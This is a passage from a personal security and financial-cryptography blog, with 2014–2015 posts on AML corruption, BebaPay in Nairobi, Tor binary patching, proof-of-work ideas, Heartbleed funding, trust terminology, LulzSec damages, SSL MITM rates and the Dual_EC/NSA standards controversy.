So, if the FATF had stopped there, then AML would have just been a massive cost on society. Westerners would paid basis points for nothing, and it would have just been a tool that shut the poor out of the financial system; something some call the problem of the 'unbanked' but that's a subject for another day (and don't use that term in my presence, thanks!). Criminals would have figured out other methods, etc.

If only. Just. But they went further.

In imposing the FATF 40 recommendations (yes, it got a lot more complicated and detailed, of course) everyone everywhere everytime also stumbled on an ancient truth of bureaucracy without control: we could do more if we had more money! Because of course the society cost of following AML was also hitting the police, implementing this wonderful notion of "follow the money" cost a lot of money.

Until someone had the bright idea: if the money is bad, why can't we seize the bad money and use it to find more bad money?

And so, it came to pass. The centuries-honoured principle of 'consolidated revenue' was destroyed and nobody noticed because "we're stopping bad people." Laws and regs were finagled through to allow money seized from AML operations to be then "shared" across the interested good parties. Typically some goes to the local police, and some to the federal justice. You can imagine the heated discussions about percentage sharing.

What could possibly go wrong?

Now the police were empowered not only to seize vast troves of money, but also keep part of it. In the twinkling of an eye, your local police force was now incentivised to look at the cash pile of everyone in their local society and 'find' a reason to bust. And, as time went on, they built their system to be robust to errors: even if they were wrong, the chances of any comeback were infinitesimal and the take might just be reduced.

AML became a profit center. Why did we let this happen? Several reasons:

1. It's in part because "bad guys have bad money" is such a compelling story that none dare question those who take "bad money from bad guys."

Indeed, money laundering is such a common criminal indictment in USA simply because people assume it's true on the face of it. The crime itself is almost as simple as moving a large pot of money around, which if you understand criminal proceedings, makes no sense at all. How can moving a large pot of money around be proven as ML before you've proven a predicate crime? But so it is.

2. How could we as society be so stupid? It's because the principle of 'consolidated revenue' has been lost in time. The basic principle is simple: *all* monies coming into the state must go to the revenue office. From there they are spent according to the annual budget. This principle is there not only for accountability but to stop the local authorities becoming the bandits The concept goes back all the way to the Magna Carta which was literally and principally about the barons securing the rights to a trial /over arbitrary seizure of their wealth/.

We dropped the ball on AML because we forgot history.

So what's all this to do with Bridges & Force? Well, recall that thought: the serious criminals can buy access. Which of course they've been doing since the beginning, the AML authorities themselves are victims to corruption.

As the various insiders in AML are corrupted, it becomes a corrosive force. Some insiders see people taking bribes and can't prove anything. Of course, these people aren't stupid, these are highly trained agents. Eventually they work out how they can't change anything and the crooks will never be ousted from inside the AML authorities. And they start with a little on the side. A little becomes a lot.

Every agent in these fields is exposed to massive corruption right from the start. It's not as if agents sent into these fields are bad. Quite the reverse, they are good and are made bad. The way AML is constructed it seems impossible that there could be any other result - Quis custodiet ipsos custodes? or Who watches the watchers?

Remember the film Training Day ? Bridges and Force are a remake, a sequel, this time moved a bit further north and with the added sex appeal of a cryptocurrency.

But the important things to realise is that this isn't unusual, it's embedded. AML is fatally corrupted because (a) it can't work anyway, and (b) they breached the principle of consolidated revenue, (c) turned themselves into victims, and then (d) the bad guys.

Until AML itself is unwound, we can't ourselves - society, police, authorities, bitcoiners - get back to the business of fighting the real bad guys. I'd love to talk to anyone about that, but unfortunately the agenda is set. We're screwed as society until we unwind AML.

Posted by iang at 06:15 PM | Comments (0)

February 16, 2015

Google's bebapay to close down, Safaricom shows them how to do it

In news today, BebaPay, the google transit payment system in Nairobi, is shutting down. As predicted in this blog, the payment system was a disaster from the start, primarily because it did not understand the governance (aka corruption) flow of funds in the industry. This resulted in the erstwhile operators of the system conspiring to make sure it would not work.

How do I know this? I was in Nairobi when it first started up, and we were analysing a lot of market sectors for payments technology at the time. It was obvious to anyone who had actually taken a ride on a Matatu (the little buses that move millions of Kenyans to work) that automating their fares was a really tough sell. And, once we figured out how the flow of funds for the Matatu business worked, from inside sources, we knew a digital payments scheme was dead on arrival.

As an aside there is a play that could have been done there, in a nearby sector, which is the tuk-tuks or motorbike operators that are clustered at every corner. But that's a case-study for another day. The real point to take away here is that you have to understand the real flows of money, and when in Africa, understand that what we westerners call corruption means that our models are basically worthless.

Or in shorter terms, take a ride on the bus before you decide to improve it.

Meanwhile, in other news, Safaricom are now making a big push into the retail POS world. This was also in the wings at the time, and when I was there, we got the inside look into this field due to a friend who was running a plucky little mPesa facilitation business for retails. He was doing great stuff, but the elephant in the room was always Safaricom, and it was no polite toilet-trained beast. Its reputation for stealing other company's business ideas was a legend; in the payment systems world, you're better off modelling Safaricom as a bank.

Ah, that makes more sense... You'll note that Safaricom didn't press over-hard to enter the transit world.

The other great takeway here is that westerners should not enter into the business of Africa lightly if at all. Westerners' biggest problem is that they don't understand the conditions there, and consequently they will be trapped in a self-fulfilling cycle of western psuedo-economic drivel. Perhaps even more surprising, they also can't turn to their reliable local NGOs or government partners or consultancies because these people are trained & paid by the westerners to feed back the same academic models.

How to break out of that trap economically is a problem I've yet to figure out. I've now spent a year outside the place, and I can report that I have met maybe 4 or 5 people amongst say 100 who actually understand the difference? Not a one of these is employed by an NGO, aid department, consultant, etc. And, these impressive organisations around the world that specialise in Africa are in this situation -- totally misinformed and often dangerously wrong.

I feel very badly for the poor of the world, they are being given the worst possible help, with the biggest smile and a wad of cash to help it along its way to failure.

Which leads me to a pretty big economic problem - solving this requires teaching what I learnt in a few years over a single coffee - can't be done. I suspect you have to go there, but even that isn't saying what's what.

Luckily however the developing world -- at least the parts I saw in Nairobi -- is now emerging with its own digital skills to address their own issues. Startup labs abound! And, from what I've seen, they are doing a much better job at it than the outsiders.

So, maybe this is a problem that will solve itself? Growth doesn't happen at more than 10% pa, so patience is perhaps the answer, not anger. We can live and hope, and if an NGO does want to take a shot at the title, I'm in for the 101th coffee.

Posted by iang at 07:59 AM | Comments (1)

December 03, 2014

MITM watch - patching binaries at Tor exit nodes

The real MITMs are so rare that protocols that are designed around them fall to the Bayesian impossibility syndrome (*). In short, false negatives cause the system to be ignored, and when the real negative indicator turns up it is treated as a false. Ignored. Fail.

Here's some evidence of that with Tor:

... I tested BDFProxy against a number of binaries and update processes, including Microsoft Windows Automatic updates. The good news is that if an entity is actively patching Windows PE files for Windows Update, the update verification process detects it, and you will receive error code 0x80200053.

.... If you Google the error code, the official Microsoft response is troublesome.

If you follow the three steps from the official MS answer, two of those steps result in downloading and executing a MS 'Fixit' solution executable. ... If an adversary is currently patching binaries as you download them, these 'Fixit' executables will also be patched. Since the user, not the automatic update process, is initiating these downloads, these files are not automatically verified before execution as with Windows Update. In addition, these files need administrative privileges to execute, and they will execute the payload that was patched into the binary during download with those elevated privileges.

And, tomorrow, another MITM!

(*) I'd love to hear a better name than Bayesian impossibility syndrome, which I just made up. It's pretty important, it explains why the current SSL/PKI/CA MITM protection can never work, relying on Bayesian statistics to explain why infrequent real attacks cannot be defended against when overshadowed by frequent false negatives.

Posted by iang at 09:40 AM | Comments (0)

September 22, 2014

More on Useful Proof of Work

Since posting that thought balloon on proof of work and its unfortunate social costs, I've been informed in private conversation that there are two considerations that I missed:

1. if the cost of the proof of work is brought down to zero by means of some re-use of the hashing, whatever that is, then we bring into question the security of the network. The network is secured literally because it costs to vote. If the vote is free, in some sense or other, then those with a free vote can seek to dominate.

2. the proof of work suffers a security weakness in that it must be verifiable at much lower cost than doing the work, as otherwise an attacker can provide junk proofs.

On the first, it is somewhat clear that this is the case in grand principle, but examining the edge cases reveals some exceptions. Take for example a 1 kilowatt hashing unit that could be used to simply provide building heat. If I use the waste output to heat my house, this is considered to result in a free vote. But this is not an adequate attack at the 51% level; my house isn't that big.

In apparent paradox, PoW as heating leads to more security because if I can heat my house and vote for the price, getting both for the price of one, it is still an effect that is capped at very low shares of the overall hashset. So, the result is more distribution in hashing and mining, rather than less, and this is a defence against today's more worrying trend being the concentration of mining in few people's hands.

More distribution directly attacks one of the current flaws of the current system. So how about this: instead of selling the latest hardware in Megawatt sizes, sell some smaller units in kilowatt sizes. I'd happily run a kilowatt grade heater instead of a bar heater, especially if it had a little panel on it showing its progress on voting, and it occasionally purred as it earned some proportion of heating costs back in shares in a hashpool.

On the second: cheaply verifiable problems are rare but they are not non-existent. Specifically, verification of some public key signatures is one. So why can't the PoW be refactored to make public key signatures?

For example, big SSL servers often outsource the hard crypto to accelerators and so forth; if the hard iron being built now could also be used for that factor, two things become possible. One is that the research effort being expended could be shared across the two requirements. Right now, all this ASIC building is resulting in some usefully fast petahashing but that has only limited spin-off potential beyond bitcoin mining.

The second plausibility, when a bitcoin mining rig passes its 6 months viable window, and becomes just more mining excrement, it can then be re-purposed to some other task. I would happily pay $1000 for something that hypothetically sped up my signature signing or verification by a factor of a 1000. The fact that this device would have fetched 100 times as much 6 months back and scored me 25 BTC every week isn't a problem, but an opportunity: for both myself and the old owner.

How would this be done in practice? Well, I want to load up my key in the device and run sigs through it. So we would need a design where each block's PoW were dependent on the full operation of a private/public key and hash signing process. E.g., take the last block, use the entropy within it to feed a known DRGB, create a deterministic private key pair, and load that up. Keep feeding the PoW machine new signature inputs ...

But, these ruminations aside, it appears that the socially unbeneficial criticism of PoW is a bent arrow. The purpose of PoW is much more subtle than might seem from first appearances. I think it is important to find a more socially aligned method, but it seems equally likely that the existing PoW of petahashing will be very hard to dislodge.

Posted by iang at 04:09 PM | Comments (3) | TrackBack

September 03, 2014

Proof of Work made useful -- auctioning off the calculation capacity is just another smart contract

Just got tipped to Andrew Poelstra's faq on ASICs, where he says of Adam Back's Proof of Work system in Bitcoin:

In places where the waste heat is directly useful, the cost of mining is merely the difference between electric heat production and ordinary heat production (here in BC, this would be natural gas). Then electricity is effectively cheap even if not actually cheap.

Which is an interesting remark. If true -- assume we're in Iceland where there is a need for lots of heat -- then Bitcoin mining can be free at the margin. Capital costs remain, but we shouldn't look a gift horse in the mouth?

My view remains, and was from the beginning of BTC when Satoshi proposed his design, that mining is a dead-weight loss to the economy because it turns good electricity into bad waste, heat. And, the capital race adds to that, in that SHA2 mining gear is solely useful for ... Bitcoin mining. Such a design cannot survive in the long run, which is a reflection of Gresham's law, sometimes expressed as the simplistic aphorism of "bad money drives out good."

Now, the good thing about predicting collapse in the long run is that we are never proven wrong, we just have to wait another day ... but as Ben Laurie pointed out somewhere or other, the current incentives encourage the blockchain mining to consume the planet, and that's not another day we want to wait for.

Not a good thing. But if we switch production to some more socially aligned pattern /such as heating/, then likely we could at least shift some of the mining to a cost-neutrality.

Why can't we go further? Why can't we make the information calculated socially useful, and benefit twice? E.g., we can search for SETI, fold some DNA, crack some RSA keys. Andrew has commented on that too, so this is no new idea:

7. What about "useful" proofs-of-work?

These are typically bad ideas for all the same reasons that Primecoin is, and also bad for a new reason: from the network's perspective, the purpose of mining is to secure the currency, but from the miner's perspective, the purpose of mining is to gain the block reward. These two motivations complement each other, since a block reward is worth more in a secure currency than in a sham one, so the miner is incentivized to secure the network rather than attacking it.

However, if the miner is motivated not by the block reward, but by some social or scientific purpose related to the proof-of-work evaluation, then these incentives are no longer aligned (and may in fact be opposed, if the miner wants to discourage others from encroaching on his work), weakening the security of the network.

I buy the general gist of the alignments of incentives, but I'm not sure that we've necessarily unaligned things just by specifying some other purpose than calculating a SHA2 to get an answer close to what we already know.

Let's postulate a program that calculates some desirable property. Because that property is of individual benefit only, then some individual can pay for it. Then, the missing link would be to create a program that takes in a certain amount of money, and distributes that to nodes that run it according to some fair algorithm.

What's a program that takes in and holds money, gets calculated by many nodes, and distributes it according to an algorithm? It's Nick Szabo's smart contract distributed over the blockchain. We already know how to do that, in principle, and in practice there are many efforts out there to improve the art. Especially, see Ethereum.

So let's assume a smart contract. Then, the question arises how to get your smart contract accepted as the block calculation for 17:20 on this coming Friday evening? That's a consensus problem. Again, we already know how to do consensus problems. But let's postulate one method: hold a donation auction and simply order these things according to the amount donated. Close the block a day in advance and leave that entire day to work out which is the consensus pick on what happens at 17:20.

Didn't get a hit? If your smart contract doesn't participate, then at 17:30 it expires and sends back the money. Try again, put in more money? Or we can imagine a variation where it has a climbing ramp of value. It starts at 10,000 at 17:20 and then adds 100 for each of the next 100 blocks then expires. This then allows an auction crossing, which can be efficient.

An interesting attack here might be that I could code up a smartcontract-block-PoW that has a backdoor, similar to the infamous DUAL_EC random number generator from NIST. But, even if I succeed in coding it up without my obfuscated clause being spotted, the best I can do is pay for it to reach the top of the rankings, then win my own payment back as it runs at 17:20.

With such an attack, I get my cake calculated and I get to eat it too. As far as incentives go to the miner, I'd be better off going to the pub. The result is still at least as good as Andrew's comment, "from the network's perspective, the purpose of mining is to secure the currency."

What about the 'difficulty' factor? Well, this is easy enough to specify, it can be part of the program. The Ethereum people are working on the basis of setting enough 'gas' to pay for the program, so the notion of 'difficulty' is already on the table.

I'm sure there is something I haven't thought of as yet. But it does seem that there is more of a benefit to wring from the mining idea. We have electricity, we have capital, and we have information. Each of those is a potential for a bounty, so as to claw some sense of value back instead of just heating the planet to keep a bunch of libertarians with coins in their pockets. Comments?

Posted by iang at 02:12 PM | Comments (5) | TrackBack

August 14, 2014

Heartbleed v Ethereum v Tezos: has the Open Source model utterly failed to secure the world's infrastructure? Or is there a missing trick here?

L.M. Goodman stated in a recent paper on Tezos:

"The heartbleed bug caused millions of dollars in damages."

To which I asked what the cites were. His immediate response (thanks!) was "Nothing very academic" but the links were very interesting in and of themselves.

First up, a number of the cost of Heartbleed:

....To put an actual number on it, given some historical precedence, I think $500 million is a good starting point [to the cost of Heartbleed].

So, read the entire article for your view, but I'll take the $500m as given for this post. It's a number, right? Then:

Big tech companies offer millions after Heartbleed crisis Thu, Apr 24 12:00 PM EDT By Jim Finkle

BOSTON (Reuters) - The world's biggest technology companies are donating millions of dollars to fund improvements in open source programs like OpenSSL, the software whose "Heartbleed" bug has sent the computer industry into turmoil.

Amazon.com Inc, Cisco Systems Inc, Facebook Inc, Google Inc, IBM, Intel Corp and Microsoft Corp are among a dozen companies that have agreed to be founding members of a group known as Core Infrastructure Initiative. Each will donate $300,000 to the venture, which is recruiting more backers among technology companies as well as the financial services sector.

Other early supporters are Dell, Fujitsu Ltd NetApp Inc, Rackspace Hosting Inc and VMware Inc.

The industry is stepping up after the group of developers who volunteer to maintain OpenSSL revealed that they received donations averaging about $2,000 a year to support the project, whose code is used to secure two-thirds of the world's websites and is incorporated into products from many of the world's most profitable technology companies.

What is truly very outstanding is that last number: $2000 a year supports an infrastructure which the world's websites reside on.

Which infrastructure was hit by a minor glitch which caused $500m of costs.

This is a wtf moment! What can we conclude from this 250,000 to 1 ratio? Try these thoughts on for size:

  • Open source drives the SSL business because Apache, Chrome and Mozilla control the lions share of activity in SSL. Has the model of open source failed to keep ecommerce reasonably secured? What appears clearer is that the open source model adds nothing to the accounting for the value to society of this infrastructure. We could argue that accounting isn't its job, but actually some proponents argue vociferously that source code should not be charged for, which is an accounting statement. So I'd say this is a germane point, because the marketing of the open source community may be making us less secure if OpenSSL developers find it hard to charge for their work.
  • The "many eyeballs" theory is open source's main claim to security. Is this a sick joke which just cost society $500m or is this an outlier never to be repeated? Or proof that it's working?
  • This all isn't to say that the paid model is better, the paid alternative includes its disasters. But the paid model does typically carry liability and allocate maintenance out of the revenues. Open source doesn't seem to do that.
  • Echoes of Y2K -- even though the combined spend was $500m, we still see no damages. No bad guys slipped in and stole any money, that we know of. Yes, there was one attack on CRA which cost a few hundred data sets, but again because the damage was caught before, we simply don't know whether spending $500m saved us anything.
  • The direct cause of costs here is one of upgrade. A sysadm wants to hit the button, and upgrade from BAD OpenSSL to GOOD. Why is that so hard? How do you upgrade SSL? Fixing bugs works in slow time because of burdensome commit privileges and the long supply chain, putting through protocol changes works in even slower times. At the protocol level, the IETF working group process is good at adding in algorithms (around 350 available, yoohoo!) but has no answer for taking things away; the combined effect of these 'essential processes' leads to an OODA cycle of 3.5 years to 80% rollout, as measured over the renegotiation bug.

This is not an attack on the people, and the ones I've met are not bad people, diligently doing their part. This is an attack on the change process, which sucks, today at a power of 250,000 to one.

$500,000,000 ⇒ $5,000,000 → $2,000

This is a widespread, burning issue, so let's look at two positive lessons from the Bitcoin world.

Bitcoin faces the same developer shortage. As Bitcoin developers get snapped up by well-heeled startup ventures with millions in VC money, and as the altCoins and side-chains and ripples and ethereums and now Tezos snap at heels with alternatives, the need for change goes up while the developer availability goes down. L.M. Goodman which makes the same point that upgrade is the archilles heel of all successful software systems:

Abstract: The popularization of Bitcoin, a decentralized crypto-currency has inspired the production of several alternative, or "alt", currencies. Ethereum, CryptoNote, and Zerocash all represent unique contributions to the crypto-currency space. Although most alt currencies harbor their own source of innovation, they have no means of adopting the innovations of other currencies which may succeed them.

Is this the same thing that happened to OpenSSL?

As an emerging model, new startups such as Ripple and Ethereum have done pre-mines: massive creation of paper value before letting loose the system in the wild. These paper values are then hoarded in foundations in order to pay for developers. As the system becomes popular, the value rises and more developers can be paid for.

Now, leaving aside the obvious problems of self-enrichment and bubble-blowing, it is at least a way to address the problems highlighted by the Heartbleed response above. For example, last Friday, Gavin Woods stated that Ethereum had raised $15m or so in BTC before they'd even shipped a real money client, which puts them several times ahead of OpenSSL. Not shabby, especially compared to the combined efforts of the world's powerful tech cabal.

And, stupidly thousands of times ahead of OpenSSL's contributions pittance ot $2000 per year.

Of course, this situation only applies to a very cool segment of the market: those cryptocurrencies which manage to garner mass attention. But it does raise a theoretical possibility at least: imagine if every open source project were also to issue their own currency?

And do their pre-mine, with say 50% reserved for developers? Obviously, it's valueless stuff at the start ... until the project booms in popularity, and the currency rises in value. Which is the alignment we want -- cash for programmers as the software starts to prove itself.

Think about a new model of open source + foundation + pre-mine -- if OpenSSL or Eclipse or Firefox were their own money, they'd also solve the problem of paying for developers. (The obvious problem of "Eclipse is not a currency" is just your problem in experience, contact any experienced financial cryptographer for how to solve that.)


Then, once you've got the money, how does it get spent? Upgrade is also a huge problem for the Bitcoin world. Adam Back has proposed two-way pegging to address the need to set up side chains for development purposes and also altCoin purposes. I've heard other ideas too, and for once, Microsoft and Apple are on the right side here with their patch Tuesdays and App Store processes.

Close with Goodman again:

We aim to remedy the potential for atrophied evolution in the crypto-currency space by presenting Tezos, a generic and self-amending crypto-ledger. Tezos can instanciate any blockchain based protocol. Its seed protocol specifies a procedure for stakeholders to approve amendments to the protocol, including amendments to the amendment procedure itself. Upgrades to Tezos are staged through a testing environment to allow stakeholders to recall potentially problematic amendments.

Maybe the new model is open source + foundation + pre-mine + dynamic upgrade?

Posted by iang at 06:14 AM | Comments (2) | TrackBack

July 23, 2014

on trust, Trust, trusted, trustworthy and other words of power

Follows is the clearest exposition of the doublethink surrounding the word 'trust' that I've seen so far. This post by Jerry Leichter on Crypto list doesn't actually solve the definitional issue, but it does map out the minefield nicely. Trustworthy?

On Jul 20, 2014, at 1:16 PM, Miles Fidelman <...> wrote:
>> On 19/07/2014 20:26 pm, Dave Horsfall wrote:
>>>
>>> A trustworthy system is one that you *can* trust;
>>> a trusted system is one that you *have* to trust.
>>
> Well, if we change the words a little, the government
> world has always made the distinction between:
> - certification (tested), and,
> - accreditation (formally approved)

The words really are the problem. While "trustworthy" is pretty unambiguous, "trusted" is widely used to meant two different things: We've placed trust in it in the past (and continue to do so), for whatever reasons; or as a synonym for trustworthy. The ambiguity is present even in English, and grows from the inherent difficulty of knowing whether trust is properly placed: "He's a trusted friend" (i.e., he's trustworthy); "I was devastated when my trusted friend cheated me" (I guess he was never trustworthy to begin with).

In security lingo, we use "trusted system" as a noun phrase - one that was unlikely to arise in earlier discourse - with the *meaning* that the system is trustworthy.

Bruce Schneier has quoted a definition from some contact in the spook world: A trusted system (or, presumably, person) is one that can break your security. What's interesting about this definition is that it's like an operational definition in physics: It completely removes elements about belief and certification and motivation and focuses solely on capability. This is an essential aspect that we don't usually capture.

When normal English words fail to capture technical distinctions adequately, the typical response is to develop a technical vocabulary that *does* capture the distinctions. Sometimes the technical vocabulary simply re-purposes common existing English words; sometimes it either makes up its own words, or uses obscure real words - or perhaps words from a different language. The former leads to no end of problems for those who are not in the field - consider "work" or "energy" in physics. The latter causes those not in the field to believe those in it are being deliberately obscurantist. But for those actually in the field, once consensus is reached, either approach works fine.

The security field is one where precise definitions are *essential*. Often, the hardest part in developing some particular secure property is pinning down precisely what the property *is*! We haven't done that for the notions surrounding "trust", where, to summarize, we have at least three:

1. A property of a sub-system a containing system assumes as part of its design process ("trusted");
2. A property the sub-system *actually provides* ("trustworthy").
3. A property of a sub-system which, if not attained, causes actual security problems in the containing system (spook definition of "trusted").

As far as I can see, none of these imply any of the others. The distinction between 1 and 3 roughly parallels a distinction in software engineering between problems in the way code is written, and problems that can actually cause externally visible failures. BTW, the software engineering community hasn't quite settled on distinct technical words for these either - bugs versus faults versus errors versus latent faults versus whatever. To this day, careful papers will define these terms up front, since everyone uses them differently.

-- Jerry

Posted by iang at 05:05 AM | Comments (1) | TrackBack

May 25, 2014

How much damage does one hacker do? FBI provides some estimates.

John Young points to some information on a conviction settlement for a hacker caught participating in LulzSec, which term the FBI explains as:

“Lulz” is shorthand for a common abbreviation used in Internet communications – LOL – or “laughing out loud.” As explained on LulzSec’s website, LulzSec.com, the group’s unofficial motto was “Laughing at your security since 2011.”

Aside from the human interest aspects of the story [0], the FBI calculates some damages (blue page 8, edited to drop non-damages estimates):

In the PSR, Probation correctly calculates that the defendant’s base offense level is 7 pursuant to U.S.S.G. §2B1.1(a)(1) and correctly applies a 22-level enhancement in light of a loss amount between $20 million and $50 million 4; a 6-level enhancement given that the offense involved more than 250 victims; ...

_____
4 This loss figure includes damages caused not only by hacks in which Monsegur personally and directly participated, but also damages from hacks perpetrated by Monsegur’s co- conspirators in which he did not directly participate. Monsegur’s actions personally and directly caused between $1,000,000 and $2,500,000 in damages. ...


That last number range of $1m to 2.5m damages is interesting, and can be contrasted to his 10 direct victims (listed on blue pages 5-6) exploited over a 1 year period.

One could surmise that this isn't an optimal solution. E.g., hypothetically, if the 10 victims were to pay each a tenth of their losses, they'd raise a salary of 100-250k and put perp to productive work, and we'd all be in net profit [1].

Obviously this didn't efficiently solve in society due to information problems. LulzEconSec, anyone?

__________
[0] this post was originally a post on Cryptography lists.
[1] Additional comments on the 'profit' side, blue page 13:

"Although difficult to quantify, it is likely that Monsegur’s actions prevented at least millions of dollars in loss to these victims."
and blue page 16:
"Through Monsegur’s cooperation, the FBI was able to thwart or mitigate at least 300 separate hacks. The amount of loss prevented by Monsegur’s actions is difficult to fully quantify, but even a conservative estimate would yield a loss prevention figure in the millions of dollars."

Posted by iang at 07:19 AM | Comments (3) | TrackBack

May 19, 2014

How to make scientifically verifiable randomness to generate EC curves -- the Hamlet variation on CAcert's root ceremony

It occurs to me that we could modify the CAcert process of verifiably creating random seeds to make it also scientifically verifiable, after the event. (See last post if this makes no sense.)

Instead of bringing a non-deterministic scheme, each participant could bring a deterministic scheme which is hitherto secret. E.g., instead of me using my laptop's webcam, I could use a Guttenberg copy of Hamlet, which I first declare in the event itself.

Another participant could use Treasure Island, a third could use Cien años de soledad.

As nobody knew what each other participate was going to declare, and the honest players amongst did a best-efforts guess on a new statically consistent tome, we can be sure that if there is at least one honest non-conspiring party, then the result is random.

And now verifiable post facto because we know the inputs.

Does this work? Does it meet all the requirements? I'm not sure because I haven't had time to think about it. Thoughts?

Posted by iang at 10:19 AM | Comments (1) | TrackBack

May 02, 2014

How many SSL MITMs are there? Here's a number: 0.2% !!!

Whenever we get into the SSL debate, there's always an aspect of glass-half-full or glass-half-empty. Is the SSL system doing the job, and we're safe? Or were we all safe anyway, and it wasn't needed? Or?

Here's a paper that suggests the third choice: that maybe SSL isn't doing the job at all, to a disturbingly high number: 0.2% of connections are MITMed.

Analyzing Forged SSL Certificates in the Wild Huang, Rice, Ellingsen, Jackson https://www.linshunghuang.com/papers/mitm.pdf

Abstract—The SSL man-in-the-middle attack uses forged SSL certificates to intercept encrypted connections between clients and servers. However, due to a lack of reliable indicators, it is still unclear how commonplace these attacks occur in the wild. In this work, we have designed and implemented a method to detect the occurrence of SSL man-in-the-middle attack on a top global website, Facebook. Over 3 million real-world SSL connections to this website were analyzed. Our results indicate that 0.2% of the SSL connections analyzed were tampered with forged SSL certificates, most of them related to antivirus software and corporate-scale content filters. We have also identified some SSL connections intercepted by malware. Limitations of the method and possible defenses to such attacks are also discussed.

Now, that may mean only a few, statistically, but if we think about the dangers of MITMing, it's always been the case that MITMing would only be used under fairly narrow circumstances because it can in theory be spotted. Therefore this is a quite a high number, it means that it is basically quite easy to do.

After eliminating those known causes such as your anti-virus scanning, corporate inspection and so forth, this number drops down by an order of magnitude. But that still leaves some 500-1000 suspicious MITMs spotted in a sample of 3.5m.

H/t to Jason and Mikko's tweet.

Posted by iang at 06:59 PM | Comments (1) | TrackBack

April 06, 2014

The evil of cryptographic choice (2) -- how your Ps and Qs were mined by the NSA

One of the excuses touted for the Dual_EC debacle was that the magical P & Q numbers that were chosen by secret process were supposed to be defaults. Anyone was at liberty to change them.

Epic fail! It turns out that this might have been just that, a liberty, a hope, a dream. From last week's paper on attacking Dual_EC:

"We implemented each of the attacks against TLS libraries described above to validate that they work as described. Since we do not know the relationship between the NIST- specified points P and Q, we generated our own point Q′ by first generating a random value e ←R {0,1,...,n−1} where n is the order of P, and set Q′ = eP. This gives our trapdoor value d ≡ e−1 (mod n) such that dQ′ = P. (Our random e and its corresponding d are given in the Appendix.) We then modified each of the libraries to use our point Q′ and captured network traces using the libraries. We ran our attacks against these traces to simulate a passive network attacker.

In the new paper that measures how hard it was to crack open TLS when corrupted by Dual_EC, the authors changed the Qs to match the P delivered, so as to attack the code. Each of the four libraries they had was in binary form, and it appears that each had to be hard-modified in binary in order to mind their own Ps and Qs.

So did (a) the library implementors forget that issue? or (b) NIST/FIPS in its approval process fail to stress the need for users to mind their Ps and Qs? or (c) the NSA knew all along that this would be a fixed quantity in every library, derived from the standard, which was pre-derived from their exhaustive internal search for a special friendly pair? In other words:

"We would like to stress that anybody who knows the back door for the NIST-specified points can run the same attack on the fielded BSAFE and SChannel implementations without reverse engineering.

Defaults, options, choice of any form has always been known as bad for users, great for attackers and a downright nuisance for developers. Here, the libraries did the right thing by eliminating the chance for users to change those numbers. Unfortunately, they, NIST and all points thereafter, took the originals without question. Doh!

Posted by iang at 07:32 PM | Comments (0) | TrackBack

April 01, 2014

The IETF's Security Area post-NSA - what is the systemic problem?

In the light of yesterday's newly revealed attack by the NSA on Internet standards, what are the systemic problems here, if any?

I think we can question the way the IETF is approaching security. It has taken a lot of thinking on my part to identify the flaw(s), and not a few rants, with many and aggressive defences and counterattacks from defenders of the faith. Where I am thinking today is this:

First the good news. The IETF's Working Group concept is far better at developing general standards than anything we've seen so far (by this I mean ISO, national committees, industry cartels and whathaveyou). However, it still suffers from two shortfalls.

1. the Working Group system is more or less easily captured by the players with the largest budget. If one views standards as the property of the largest players, then this is not a problem. If OTOH one views the Internet as a shared resource of billions, designed to serve those billions back for their efforts, the WG method is a recipe for disenfranchisement. Perhaps apropos, spotted on the TLS list by Peter Gutmann:

Documenting use cases is an unnecessary distraction from doing actual work. You'll note that our charter does not say "enumerate applications that want to use TLS".

I think reasonable people can debate and disagree on the question of whether the WG model disenfranchises the users, because even though a a company can out-manouver the open Internet through sheer persistence and money, we can still see it happen. In this, IETF stands in violent sunlight compared to that travesty of mouldy dark closets, CABForum, which shut users out while industry insiders prepared the base documents in secrecy.

I'll take the IETF any day, except when...

2. the Working Group system is less able to defend itself from a byzantine attack. By this I mean the security concept of an attack from someone who doesn't follow the rules, and breaks them in ways meant to break your model and assumptions. We can suspect byzantium disclosures in the fingered ID:

The United States Department of Defense has requested a TLS mode which allows the use of longer public randomness values for use with high security level cipher suites like those specified in Suite B [I-D.rescorla-tls-suiteb]. The rationale for this as stated by DoD is that the public randomness for each side should be at least twice as long as the security level for cryptographic parity, which makes the 224 bits of randomness provided by the current TLS random values insufficient.

Assuming the story as told so far, the US DoD should have added "and our friends at the NSA asked us to do this so they could crack your infected TLS wide open in real time."

Such byzantine behaviour maybe isn't a problem when the industry players are for example subject to open observation, as best behaviour can be forced, and honesty at some level is necessary for long term reputation. But it likely is a problem where the attacker is accustomed to that other world: lies, deception, fraud, extortion or any of a number of other tricks which are the tools of trade of the spies.

Which points directly at the NSA. Spooks being spooks, every spy novel you've ever read will attest to the deception and rule breaking. So where is this a problem? Well, only in the one area where they are interested in: security.

Which is irony itself as security is the field where byzantine behaviour is our meat and drink. Would the Working Group concept past muster in an IETF security WG? Whether it does or no depends on whether you think it can defend against the byzantine attack. Likely it will pass-by-fiat because of the loyalty of those involved, I have been one of those WG stalwarts for a period, so I do see the dilemma. But in the cold hard light of sunlight, who is comfortable supporting a WG that is assisted by NSA employees who will apply all available SIGINT and HUMINT capabilities?

Can we agree or disagree on this? Is there room for reasonable debate amongst peers? I refer you now to these words:

On September 5, 2013, the New York Times [18], the Guardian [2] and ProPublica [12] reported the existence of a secret National Security Agency SIGINT Enabling Project with the mission to “actively [engage] the US and foreign IT industries to covertly influence and/or overtly leverage their commercial products’ designs.” The revealed source documents describe a US $250 million/year program designed to “make [systems] exploitable through SIGINT collection” by inserting vulnerabilities, collecting target network data, and influencing policies, standards and specifications for commercial public key technologies. Named targets include protocols for “TLS/SSL, https (e.g. webmail), SSH, encrypted chat, VPNs and encrypted VOIP.”
The documents also make specific reference to a set of pseudorandom number generator (PRNG) algorithms adopted as part of the National Institute of Standards and Technology (NIST) Special Publication 800-90 [17] in 2006, and also standardized as part of ISO 18031 [11]. These standards include an algorithm called the Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC). As a result of these revelations, NIST reopened the public comment period for SP 800-90.

And as previously written here. The NSA has conducted a long term programme to breach the standards-based crypto of the net.

As evidence of this claim, we now have *two attacks*, being clear attempts to trash the security of TLS and freinds, and we have their own admission of intent to breach. In their own words. There is no shortage of circumstantial evidence that NSA people have pushed, steered, nudged the WGs to make bad decisions.

I therefore suggest we have the evidence to take to a jury. Obviously we won't be allowed to do that, so we have to do the next best thing: use our collective wisdom and make the call in the public court of Internet opinion.

My vote is -- guilty.

One single piece of evidence wasn't enough. Two was enough to believe, but alternate explanations sounded plausible to some. But we now have three solid bodies of evidence. Redundancy. Triangulation. Conclusion. Guilty.

